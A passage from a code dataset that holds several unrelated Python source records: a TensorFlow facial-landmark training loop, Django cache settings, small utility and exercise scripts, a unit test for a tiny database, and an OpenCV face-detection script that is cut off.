self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n batch_images.copy(), batch_maps_small_pred,batch_maps_gt, 
image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n sample_path_channels = os.path.join(\n self.save_sample_path, model_name + '-' + self.test_data + '-sample-%d-to-%d-3.png' % (\n i * self.sample_grid, (i + 1) * self.sample_grid))\n\n scipy.misc.imsave(sample_path_channels, map_per_channel)\n\n print ('saved %s' % sample_path_imgs)\n\n if self.compute_nme and self.test_data in ['full', 'challenging', 'common', 'training', 'test']:\n print ('\\n Calculating NME on: ' + self.test_data + '...')\n pred_lms, lms_gt = self.predict_landmarks_in_batches(self.img_menpo_list, sess)\n nme = sess.run(self.nme_loss, {self.pred_lms_small: pred_lms, self.lms_small: lms_gt})\n print ('NME on ' + self.test_data + ': ' + str(nme))\n\n def train(self):\n # set random seed\n tf.set_random_seed(1234)\n np.random.seed(1234)\n # build a graph\n # add placeholders\n self.add_placeholders()\n # build model\n self.build_model()\n # create loss ops\n self.create_loss_ops()\n # create summary ops\n self.create_summary_ops()\n\n # create optimizer and training op\n global_step = tf.Variable(0, trainable=False)\n lr = tf.train.exponential_decay(self.learning_rate,global_step, self.step, self.gamma, staircase=True)\n if self.adam_optimizer:\n optimizer = tf.train.AdamOptimizer(lr)\n else:\n optimizer = tf.train.MomentumOptimizer(lr, self.momentum)\n\n train_op = optimizer.minimize(self.total_loss,global_step=global_step)\n\n # TODO: remove\n if self.approx_maps_gpu: # create heat-maps using tf convolution. use only with GPU support!\n self.build_hm_generator()\n\n with tf.Session(config=self.config) as sess:\n\n tf.global_variables_initializer().run()\n\n # load pre trained weights if load_pretrain==True\n if self.load_pretrain:\n print\n print('*** loading pre-trained weights from: '+self.pre_train_path+' ***')\n loader = tf.train.Saver()\n loader.restore(sess, self.pre_train_path)\n print(\"*** Model restore finished, current global step: %d\" % global_step.eval())\n\n # for fine-tuning, choose reset_training_op==True. 
when resuming training, reset_training_op==False\n if self.reset_training_op:\n print (\"resetting optimizer and global step\")\n opt_var_list = [optimizer.get_slot(var, name) for name in optimizer.get_slot_names()\n for var in tf.global_variables() if optimizer.get_slot(var, name) is not None]\n opt_var_list_init = tf.variables_initializer(opt_var_list)\n opt_var_list_init.run()\n sess.run(global_step.initializer)\n\n # create model saver and file writer\n summary_writer = tf.summary.FileWriter(logdir=self.save_log_path, graph=tf.get_default_graph())\n saver = tf.train.Saver()\n\n print\n print('*** Start Training ***')\n\n # initialize some variables before training loop\n resume_step = global_step.eval()\n num_train_images = len(self.img_menpo_list)\n batches_in_epoch = int(float(num_train_images) / float(self.batch_size))\n epoch = int(resume_step / batches_in_epoch)\n img_inds = self.epoch_inds_shuffle[epoch, :]\n p_texture = self.p_texture\n p_geom = self.p_geom\n artistic_reload = False\n basic_reload = True\n log_valid = True\n log_valid_images = True\n\n if self.allocate_once:\n batch_images = np.zeros([self.batch_size, self.image_size, self.image_size, self.c_dim]).astype('float32')\n batch_lms_small = np.zeros([self.batch_size, self.num_landmarks, 2]).astype('float32')\n batch_lms_small_pred = np.zeros([self.batch_size, self.num_landmarks, 2]).astype('float32')\n if self.approx_maps_gpu:\n batch_hm_base_small = np.zeros((self.batch_size * self.num_landmarks,\n int(self.image_size/4), int(self.image_size/4), 1)).astype('float32')\n else:\n batch_maps_small = np.zeros((self.batch_size, int(self.image_size/4),\n int(self.image_size/4), self.num_landmarks)).astype('float32')\n\n if self.approx_maps_cpu:\n gaussian_filt = create_gaussian_filter(sigma=self.sigma, win_mult=self.win_mult)\n\n for step in range(resume_step, self.train_iter):\n\n j = step % batches_in_epoch # j==0 if we finished an epoch\n\n if step > resume_step and j == 0: # if we finished an epoch and this isn't the first step\n epoch += 1\n img_inds = self.epoch_inds_shuffle[epoch, :] # get next shuffled image inds\n artistic_reload = True\n log_valid = True\n log_valid_images = True\n if self.use_epoch_data:\n epoch_dir = os.path.join(self.epoch_data_dir, str(epoch))\n self.img_menpo_list = load_menpo_image_list(\n self.img_path, train_crop_dir=epoch_dir, img_dir_ns=None, mode=self.mode,\n bb_dictionary=self.bb_dictionary, image_size=self.image_size, test_data=self.test_data,\n augment_basic=False, augment_texture=False, augment_geom=False)\n\n # add basic augmentation (if basic_start > 0 and augment_basic is True)\n if basic_reload and (epoch >= self.basic_start) and self.basic_start > 0 and self.augment_basic:\n basic_reload = False\n self.img_menpo_list = reload_menpo_image_list(\n self.img_path, self.train_crop_dir, self.img_dir_ns, self.mode, self.train_inds,\n image_size=self.image_size, augment_basic=self.augment_basic,\n augment_texture=(self.augment_texture and epoch >= self.artistic_start), p_texture=p_texture,\n augment_geom=(self.augment_geom and epoch >= self.artistic_start), p_geom=p_geom)\n print (\"****** adding basic augmentation ******\")\n\n # increase artistic augmentation probability\n if ((epoch % self.artistic_step == 0 and epoch >= self.artistic_start and self.artistic_step != -1)\n or (epoch == self.artistic_start)) and (self.augment_geom or self.augment_texture)\\\n and artistic_reload:\n\n artistic_reload = False\n\n if epoch == self.artistic_start:\n print (\"****** adding artistic 
augmentation ******\")\n print (\"****** augment_geom: \" + str(self.augment_geom) + \", p_geom: \" + str(p_geom) + \" ******\")\n print (\"****** augment_texture: \" + str(self.augment_texture) + \", p_texture: \" +\n str(p_texture) + \" ******\")\n\n if epoch % self.artistic_step == 0 and self.artistic_step != -1:\n print (\"****** increasing artistic augmentation probability ******\")\n\n p_geom = 1.- 0.95 ** (epoch/self.artistic_step)\n p_texture = 1. - 0.95 ** (epoch/self.artistic_step)\n\n print (\"****** augment_geom: \" + str(self.augment_geom) + \", p_geom: \" + str(p_geom) + \" ******\")\n print (\"****** augment_texture: \" + str(self.augment_texture) + \", p_texture: \" +\n str(p_texture) + \" ******\")\n\n self.img_menpo_list = reload_menpo_image_list(\n self.img_path, self.train_crop_dir, self.img_dir_ns, self.mode, self.train_inds,\n image_size=self.image_size, augment_basic=(self.augment_basic and epoch >= self.basic_start),\n augment_texture=self.augment_texture, p_texture=p_texture,\n augment_geom=self.augment_geom, p_geom=p_geom)\n\n # get batch images\n batch_inds = img_inds[j * self.batch_size:(j + 1) * self.batch_size]\n\n if self.approx_maps_gpu: # TODO: remove\n if self.allocate_once:\n load_images_landmarks_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, landmarks_small=batch_lms_small,\n landmarks=None, primary=True, image_size=self.image_size, scale=self.scale)\n\n create_heat_maps_base_alloc_once(\n landmarks_small=batch_lms_small.astype(int), landmarks=None,\n hm_small=batch_hm_base_small, hm_large=None, primary=True, num_images=self.batch_size,\n num_landmarks=self.num_landmarks)\n else:\n batch_images, batch_lms_small = load_images_landmarks(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size, c_dim=self.c_dim,\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n batch_hm_base_small = create_heat_maps_base(\n landmarks_small=batch_lms_small.astype(int), landmarks=None, primary=True,\n num_images=self.batch_size, image_size=self.image_size, num_landmarks=self.num_landmarks)\n\n batch_maps_small = sess.run(self.filt_hm_small, {self.sparse_hm_small: batch_hm_base_small})\n elif self.approx_maps_cpu:\n if self.allocate_once:\n load_images_landmarks_approx_maps_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, maps_small=batch_maps_small,\n maps=None, landmarks=batch_lms_small, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, scale=self.scale, gauss_filt_small=gaussian_filt,\n win_mult=self.win_mult, sigma=self.sigma, save_landmarks=self.compute_nme)\n else:\n batch_images, batch_maps_small, batch_lms_small = load_images_landmarks_approx_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, c_dim=self.c_dim, scale=self.scale,\n gauss_filt_small=gaussian_filt, win_mult=self.win_mult, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n else:\n if self.allocate_once:\n load_images_landmarks_maps_alloc_once(\n self.img_menpo_list, batch_inds, images=batch_images, maps_small=batch_maps_small,\n landmarks=batch_lms_small, maps=None, primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n else:\n batch_images, batch_maps_small, batch_lms_small = load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size, c_dim=self.c_dim,\n num_landmarks=self.num_landmarks, 
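# The artistic-augmentation schedule above ramps both probabilities toward 1 as
# p = 1 - 0.95 ** (epoch / artistic_step), so augmentation strength grows
# geometrically with training progress. A quick standalone check of the curve:
def augment_prob(epoch, artistic_step=2):
    return 1.0 - 0.95 ** (epoch / artistic_step)

# augment_prob(2) -> 0.05, augment_prob(10) -> ~0.226, augment_prob(50) -> ~0.723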
scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n feed_dict_train = {self.images: batch_images, self.heatmaps_small: batch_maps_small}\n\n sess.run(train_op, feed_dict_train)\n\n # save to log and print status\n if step == resume_step or (step + 1) % self.print_every == 0:\n\n # log probability of artistic augmentation\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n if self.augment_geom and not self.augment_texture:\n art_augment_prob_dict = {self.p_geom_log: p_geom}\n elif self.augment_texture and not self.augment_geom:\n art_augment_prob_dict = {self.p_texture_log: p_texture}\n else:\n art_augment_prob_dict = {self.p_texture_log: p_texture, self.p_geom_log: p_geom}\n\n # train data log\n if self.compute_nme:\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred, batch_landmarks=batch_lms_small_pred,\n batch_size=self.batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n else:\n batch_lms_small_pred = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, self.batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n train_feed_dict_log = {\n self.images: batch_images, self.heatmaps_small: batch_maps_small,\n self.train_lms_small: batch_lms_small, self.train_pred_lms_small: batch_lms_small_pred}\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n train_feed_dict_log.update(art_augment_prob_dict)\n\n summary, l_t, l_nme = sess.run(\n [self.batch_summary_op, self.total_loss, self.nme_loss], train_feed_dict_log)\n\n print (\n 'epoch: [%d] step: [%d/%d] primary loss: [%.6f] NME: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_t, l_nme))\n else:\n train_feed_dict_log = {self.images: batch_images, self.heatmaps_small: batch_maps_small}\n if self.log_artistic_augmentation_probs and (self.augment_geom or self.augment_texture):\n train_feed_dict_log.update(art_augment_prob_dict)\n\n summary, l_t = sess.run(\n [self.batch_summary_op, self.total_loss], train_feed_dict_log)\n\n print (\n 'epoch: [%d] step: [%d/%d] primary loss: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_t))\n\n summary_writer.add_summary(summary, step)\n\n # valid data log\n if self.valid_size > 0 and (log_valid and epoch % self.log_valid_every == 0)\\\n and self.compute_nme:\n log_valid = False\n\n if self.allocate_once:\n self.predict_landmarks_in_batches_loaded(self.valid_images_loaded, sess)\n valid_feed_dict_log = {\n self.valid_lms_small: self.valid_landmarks_loaded,\n self.valid_pred_lms_small: self.valid_landmarks_pred}\n else:\n valid_pred_lms = self.predict_landmarks_in_batches_loaded(self.valid_images_loaded, sess)\n valid_feed_dict_log = {\n self.valid_lms_small: self.valid_landmarks_loaded,\n self.valid_pred_lms_small: valid_pred_lms}\n\n v_summary,l_v_nme = sess.run([self.valid_summary, self.valid_nme_loss], valid_feed_dict_log)\n summary_writer.add_summary(v_summary, step)\n\n print (\n 'epoch: [%d] step: [%d/%d] valid NME: [%.6f]' % (\n epoch, step + 1, self.train_iter, l_v_nme))\n\n # save model\n if (step + 1) % self.save_every == 0:\n saver.save(sess, os.path.join(self.save_model_path, 'deep_heatmaps'), global_step=step + 1)\n print ('model/deep-heatmaps-%d saved' % (step + 1))\n\n # save images. 
TODO: add option to allocate once\n if step == resume_step or (step + 1) % self.sample_every == 0:\n\n if not self.compute_nme:\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n batch_lms_small_pred=None\n\n merged_img = merge_images_landmarks_maps_gt(\n batch_images.copy(), batch_maps_small_pred, batch_maps_small,\n landmarks=batch_lms_small_pred, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid, scale=self.scale,\n circle_size=0, fast=self.fast_img_gen)\n\n if self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n batch_images.copy(), batch_maps_small_pred,batch_maps_small,\n image_size=int(self.image_size/4), num_landmarks=self.num_landmarks, scale=self.scale)\n\n if self.sample_to_log:\n if self.sample_per_channel:\n summary_img = sess.run(\n self.img_summary, {self.log_image_map: np.expand_dims(merged_img, 0),\n self.log_map_channels: np.expand_dims(map_per_channel, 0)})\n else:\n summary_img = sess.run(\n self.img_summary, {self.log_image_map: np.expand_dims(merged_img, 0)})\n\n summary_writer.add_summary(summary_img, step)\n\n if (self.valid_size >= self.sample_grid) and self.save_valid_images and\\\n (log_valid_images and epoch % self.log_valid_every == 0):\n log_valid_images=False\n\n batch_maps_small_pred_val = sess.run(\n self.pred_hm_p, {self.images: self.valid_images_loaded[:self.sample_grid]})\n\n merged_img = merge_images_landmarks_maps_gt(\n self.valid_images_loaded[:self.sample_grid].copy(), batch_maps_small_pred_val,\n self.valid_gt_maps_loaded, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid,\n scale=self.scale, circle_size=0, fast=self.fast_img_gen)\n\n if self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n self.valid_images_loaded[:self.sample_grid].copy(), batch_maps_small_pred_val,\n self.valid_gt_maps_loaded, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n summary_img = sess.run(\n self.img_summary_valid, {self.log_image_map: np.expand_dims(merged_img, 0),\n self.log_map_channels: np.expand_dims(map_per_channel, 0)})\n else:\n summary_img = sess.run(\n self.img_summary_valid, {self.log_image_map: np.expand_dims(merged_img, 0)})\n summary_writer.add_summary(summary_img, step)\n\n else:\n sample_path_imgs = os.path.join(self.save_sample_path,'epoch-%d-train-iter-%d-1.png'\n % (epoch, step + 1))\n scipy.misc.imsave(sample_path_imgs, merged_img)\n if self.sample_per_channel:\n sample_path_ch_maps = os.path.join(self.save_sample_path, 'epoch-%d-train-iter-%d-3.png'\n % (epoch, step + 1))\n scipy.misc.imsave(sample_path_ch_maps, map_per_channel)\n\n print('*** Finished Training ***')\n\n def get_maps_image(self, test_image, reuse=None):\n self.add_placeholders()\n # build model\n pred_hm_p = self.heatmaps_network(self.images,reuse=reuse)\n\n with tf.Session(config=self.config) as sess:\n # load trained parameters\n saver = tf.train.Saver()\n saver.restore(sess, self.test_model_path)\n _, model_name = os.path.split(self.test_model_path)\n\n test_image = test_image.pixels_with_channels_at_back().astype('float32')\n if self.scale is '255':\n test_image *= 255\n elif self.scale is '0':\n test_image = 2 * test_image - 1\n\n test_image_map = sess.run(pred_hm_p, {self.images: np.expand_dims(test_image,0)})\n\n return 
test_image_map\n","repo_name":"papulke/face-of-art","sub_path":"old/temp/deep_heatmaps_model_primary_net.py","file_name":"deep_heatmaps_model_primary_net.py","file_ext":"py","file_size_in_byte":50203,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"61"} +{"seq_id":"27080635028","text":"\"\"\"\nCache configuration for zygoat projects. We use ``django-redis`` to handle connecting to the cache backend, and then tell django to use a write-through cache backend for sessions. This makes sessions blazingly fast and persistent in the case that the cache gets cleared.\n\"\"\"\n\nfrom .environment import prod_required_env\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": prod_required_env(\"DJANGO_REDIS_CACHE_URL\", \"redis://cache:6379/0\"),\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n }\n}\n\"\"\"\nConfigures the default cache to point to the zygoat generated docker container.\n\"\"\"\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n\"\"\"\n.. seealso::\n - `How to use sessions `_\n - `Using cached sessions `_\n\"\"\"\n","repo_name":"MetLifeLegalPlans/zygoat-django","sub_path":"zygoat_django/settings/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37593216893","text":"import os\nimport sys\nimport math\n\ndef find_median(l1,l2):\n median = 0\n result=[]\n result=l1+l2\n result = sorted(result)\n if len(result) % 2 == 0:\n median = math.floor((len(result) - 1)/2)\n else:\n median = (len(result) - 1)/2\n return (result[median],result)\n\nlist1=[]\nlist2=[]\n\nlist1 = input('\\nEnter the first list of numbers: ')\nlist2 = input('Enter the second list of numbers: ')\nlist1=list1.replace(' ',', ')\nlist2=list2.replace(' ',', ')\n\nprint('First list: [' + str(list1)+']')\nprint('Second list: [' + str(list2)+']')\n\nlist1 = [int(x) for x in list1.split(', ')]\nlist2 = [int(x) for x in list2.split(', ')]\n\n(med,res) = find_median(list1,list2)\n\nprint('Merged List: ' + str(res))\nprint('Median: '+ str(med))","repo_name":"karimitani/ECE364","sub_path":"Prelab08/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33484260725","text":"import os\nimport datetime as dt\n# Useful Functions\nDEBUG_DEFAULT = 0\n\n# Wrapper function for dive_for_values where the detail path is a dot list\ndef dive_for_dot_values(dot_locs, info_dir, failzero = False, DEBUG = DEBUG_DEFAULT, as_val = 0, full_path = 1):\n if not isinstance(dot_locs, str):\n if isinstance(dot_locs,list):\n if len(dot_locs) == 1:\n dot_locs = dot_locs[0]\n return dive_for_dot_values(dot_locs,info_dir, failzero, DEBUG, as_val, full_path = full_path)\n else:\n # A list of dot locations\n out_dict = {}\n for dotloc in dot_locs:\n dive_result = dive_for_dot_values(dotloc, info_dir, failzero, DEBUG, as_val=0, full_path = full_path)\n out_dict.update(dive_result) # Dive result must be a dict\n return out_dict\n else:\n print(\" Bad input. 
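# The merged-median script above indexes the merged list with (len(result)-1)/2,
# which is a float on Python 3, so odd-length inputs raise TypeError. A corrected
# sketch using floor division for both parities:
def merged_median(l1, l2):
    merged = sorted(l1 + l2)
    return merged[(len(merged) - 1) // 2]  # lower median for even lengths

# merged_median([1, 3, 5], [2, 4]) -> 3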
Expected string or list of strings but got:\", dot_locs)\n return {}\n\n new_nest_list = _docloc_to_list(dot_locs)\n\n out = dive_for_values(new_nest_list, info_dir, failzero, DEBUG, as_val, full_path = full_path)\n return out\n\n# Recursively looks in dicts for nested dicts until finds values.\n# Returns a dict of values\ndef dive_for_values(nest_list, info_dir, failzero = False, DEBUG = DEBUG_DEFAULT, as_val = 0, full_path = 1):\n if isinstance(nest_list,int) or isinstance(nest_list,float):\n return nest_list\n \n if isinstance(nest_list,list) and len(nest_list) > 0:\n inner_list = nest_list[0]\n if len(inner_list) < 2:\n if len(inner_list) == 1:\n in_in_list = inner_list[0]\n if isinstance(in_in_list, str):\n nest_list = inner_list # Single value but accidentially in a list\n elif isinstance(inner_list[0], str) and isinstance(inner_list[1], list):\n if not len(inner_list) == 2:\n print(\" Bad list length, expected len 2 but got len\",len(inner_list),nest_list)\n return {}\n \n dive_result = _dive(nest_list, info_dir, \"\", failzero = failzero, DEBUG = DEBUG)\n \n # as_val. Returns a raw value IF there is only 1 entry\n if len(dive_result) == 1 and as_val:\n dive_value = list(dive_result.values())[0]\n return dive_value\n\n return dive_result\n\n\ndef _dive(c_list, c_dir, prefix, failzero = False, DEBUG = DEBUG_DEFAULT, full_path = 1):\n out = {}\n for valname in c_list:\n # if DEBUG: print(\" vname\", valname, \"c_list\", c_list)\n if isinstance(valname, list):\n if not len(valname) == 2:\n raise Exception(\" Valname expected len 2\", str(valname))\n nextdirname, nestlist = valname\n if not nextdirname in c_dir:\n if failzero:\n for vn in valname:\n if isinstance(vn, list):\n print(\" vn is a list\",vn)\n return out\n out[vn] = 0\n else:\n if DEBUG: print(\" ERROR! Cannot find subdict<{}> in {}\".format(nextdirname,c_dir))\n return out \n else:\n nextdir = c_dir[nextdirname]\n new_pfx = _dive_prefix(prefix, nextdirname)\n out.update(_dive(nestlist,nextdir, new_pfx, failzero=failzero, DEBUG=DEBUG))\n else:\n if valname in c_dir:\n rawval = c_dir[valname]\n out[valname] = rawval\n elif failzero:\n # Returns 0\n out[valname] = 0\n else:\n if DEBUG: print(\" ERROR! 
Cannot find variable<{}>\".format(valname))\n \n return out\n\ndef _dive_prefix(oldpfx, cdir):\n tkn = \".\"\n final_prefix = cdir + tkn\n if not oldpfx == \"\":\n final_prefix = oldpfx + tkn + final_prefix\n return final_prefix\n\ndef _docloc_to_list(dot_loc, flatlist = False):\n # str, list\n def collect(curr, prev):\n if flatlist:\n prev.append(curr)\n return prev\n else:\n if prev == []:\n return [curr]\n else:\n return [curr, prev]\n\n pathlist = dot_loc.split(\".\")\n new_nest_list = []\n\n while 1:\n if len(pathlist) == 0:\n break\n curr = pathlist.pop(-1)\n new_nest_list = collect(curr, new_nest_list)\n \n if not flatlist: new_nest_list = [new_nest_list]\n return new_nest_list\n\n# Changes info\ndef dotpop(dotloc, original_info):\n flatlist = _docloc_to_list(dotloc, flatlist = 1)\n curr_d = original_info\n for ddir in flatlist:\n if ddir == flatlist[-1]:\n if ddir in curr_d:\n popped = curr_d.pop(ddir)\n return popped\n else:\n return False\n\n if ddir in curr_d:\n curr_d = curr_d.get(ddir)\n else:\n print(\" WARNING \", ddir,\"not found in\",original_info)\n return False\n\ndef add_enh(key, value, ext_dict, subdict_name, topup, enhanced, persist = False, overwrite = False, DEBUG = 0):\n if DEBUG: print(\"Enhancing!{}:{}\".format(key,value))\n\n if key in ext_dict and not overwrite:\n ext_dict[key] = ext_dict[key] + value\n else:\n ext_dict[key] = value\n \n # Dict of info to be returned and written into main info\n if persist:\n topup[key] = value\n enhanced[key] = value # Write to enhanced main dict instead of subdict\n else:\n # Subdict names include calc_ext and rep_ext\n if not subdict_name in enhanced: enhanced[subdict_name] = {} \n enhanced[subdict_name].update(ext_dict) # Write to the subdict in enhanced\n return\n\ndef log_error(elog):\n print(\"###! ERROR LOG !###\",elog)\n chatbot_directory = os.getcwd()\n filename = os.path.join(chatbot_directory,\"errorlog.txt\")\n \n try:\n with open(filename, \"a\") as f: # append so earlier log entries are kept\n f.write(elog)\n except Exception as e:\n print(\"Failed to log error!\", e)\n return\n\n\ndef cbround(val, dp = 0):\n if isinstance(val, str):\n return val\n \n if dp == 0:\n dp_arg = None # round doesn't work with just 0\n else:\n dp_arg = dp\n \n return round(val,dp_arg)\n\ndef get_yearmonth():\n dtobj = dt.datetime.now()\n years = str(dtobj.year)\n raw_months = str(dtobj.month)\n if len(raw_months) == 1:\n months = \"0\" + str(raw_months)\n else:\n months = raw_months\n out = years + months\n assert(len(out) == 6)\n return out","repo_name":"xcalibersword/chatbot","sub_path":"chatbot_utils.py","file_name":"chatbot_utils.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25508082673","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\ndef get_request(items):\n return input(f\" What would you like? 
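# _docloc_to_list above turns a dotted path like "a.b.c" into the nested query
# shape the _dive helpers walk ([["a", ["b", ["c"]]]]). For comparison, a tiny
# direct dot-path lookup over a nested dict (an illustrative helper, not part
# of chatbot_utils):
def get_by_dotpath(d, dotpath, default=None):
    cur = d
    for key in dotpath.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur

# get_by_dotpath({"a": {"b": {"c": 7}}}, "a.b.c") -> 7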
({items}): \").lower()\n\ncoffee_maker = CoffeeMaker()\nmoney_machine = MoneyMachine()\nmenu = Menu()\n\ncoffee_maker.is_on = True\n\nwhile coffee_maker.is_on:\n request = get_request(menu.get_items())\n if request == \"off\":\n coffee_maker.is_on = False\n elif request == \"report\":\n coffee_maker.report()\n money_machine.report()\n else:\n drink = menu.find_drink(request)\n if coffee_maker.is_resource_sufficient(drink):\n if money_machine.make_payment(drink.cost):\n coffee_maker.make_coffee(drink)","repo_name":"sdearth/pythoncourse","sub_path":"day016/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3208434592","text":"from typing import List\n\n\nclass Solution:\n def addSpaces(self, s: str, spaces: List[int]) -> str:\n for i in range(len(spaces)):\n index = spaces[i] + i\n s = s[:index] + ' ' + s[index:]\n return s\n\n\ns = \"spacing\"\nspaces = [0,1,2,3,4,5,6]\nsolution = Solution()\nres = solution.addSpaces(s, spaces)\nprint(res)\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"竞赛/A272/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72660437953","text":"import random\n\nimport numpy as np\nfrom behavioural_cloning import random_search\n\n# Define hyperparameter_space for random search\nhyperparameter_space = {\n \"learning_rate\": [2e-5, 2e-6, 1e-5, 1e-6],\n \"weight_decay\": [0, 1e-2, 1e-3],\n \"kl_loss_weight\": [0.5, 1.0, 2.0],\n \"batch_size\": [16, 32],\n \"max_grad_norm\": [1.0, 2.0, 5.0, 10.0],\n}\n\nif __name__ == \"__main__\":\n # Set the paths and other required variables\n data_dir = \"data/MineRLBasaltBuildVillageHouse-v0\"\n in_model = \"data/VPT-models/foundation-model-1x.model\"\n in_weights = \"data/VPT-models/foundation-model-1x.weights\"\n out_weights = \"train/MineRLBasaltBuildVillageHouse.weights\"\n env_name = \"MineRLBasaltBuildVillageHouse-v0\"\n\n # Run the random search\n best_hyperparameters = random_search(\n data_dir,\n in_model,\n in_weights,\n env_name,\n hyperparameter_space,\n n_iter=15,\n max_batches=5000,\n )\n\n print(\"Best hyperparameters found:\", best_hyperparameters)\n","repo_name":"DagValvik/Human-Guided-Phasic-Policy-Gradient-in-Minecraft","sub_path":"code/hyperparameter_tuning_bc.py","file_name":"hyperparameter_tuning_bc.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39852685149","text":"# test_table.py = test \n\n\nimport lintest\n\nfrom doc import Doc\nfrom table import Table\nfrom database import Database\n\n#---------------------------------------------------------------------\n\nclass T_Table(lintest.TestCase):\n\n def test_creation(self):\n self.db = Database(\"mydatabase\")\n t = self.db[\"mytable\"]\n self.assertEqual(t.count(), 0, \"no documents yet\")\n \n d = Doc(foo=2, bar=3)\n t.addDoc(d)\n self.assertEqual(t.count(), 1, \"1 document now\")\n print(d)\n \n def test_addSomeDocs(self):\n t = self.db[\"mytable\"]\n self.assertEqual(t.count(), 1, \"still 1 document\")\n \n countSB = 1\n for foo in [5,4,6]:\n for bar in ['Cedric', 'Alice', 'Bob']:\n d = Doc(foo=foo, bar=bar)\n t.addDoc(d)\n countSB += 1\n self.assertEqual(t.count(), countSB, \n \"count of documents in mytable\")\n #//for\n #//for\n \n def test_find_all(self):\n \"\"\" find all the documents 
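# addSpaces above rebuilds the string with repeated slicing (O(n^2)), offsetting
# each index by i because every inserted space shifts later positions. A
# linear-time sketch that collects the pieces and joins once:
from typing import List

def add_spaces(s: str, spaces: List[int]) -> str:
    parts, prev = [], 0
    for idx in spaces:
        parts.append(s[prev:idx])
        prev = idx
    parts.append(s[prev:])
    return " ".join(parts)

# add_spaces("spacing", [0, 1, 2, 3, 4, 5, 6]) -> " s p a c i n g"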
\"\"\"\n t = self.db[\"mytable\"]\n ds = list(t.find())\n self.assertSame(len(ds), 10, \"returned all 10 documents\")\n \n def test_find_q(self):\n \"\"\" find() using a query \"\"\"\n t = self.db[\"mytable\"]\n ds = list(t.find({'bar':'Alice'}))\n self.assertSame(len(ds), 3, \"returned 3 documents\")\n fooValues = sorted(d.foo for d in ds)\n self.assertSame(fooValues, [4, 5, 6])\n \n \n \n\n#---------------------------------------------------------------------\n \ngroup = lintest.TestGroup()\ngroup.add(T_Table)\n\nif __name__=='__main__': group.run()\n\n#end\n","repo_name":"cabalamat/picobase","sub_path":"picobase/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9301491724","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml') # face\neye_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye.xml') # eye\nsmile_cascade=cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml') # smile\n\n#3 open the camera\ncapture=cv2.VideoCapture(0)\n\nwhile True:\n # read the current frame\n ret, img = capture.read()\n # 6 convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # 7 detect faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 3, 0, (120, 120))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 255), 3)\n face_area = img[y:y + h, x:x + w]\n eyes = eye_cascade.detectMultiScale(face_area,1.3,10)\n # run the eye cascade classifier on the face region; eyes is a list of eye coordinates\n for (ex, ey, ew, eh) in eyes:\n # draw the eye box in green with line width 1\n cv2.rectangle(face_area, (ex, 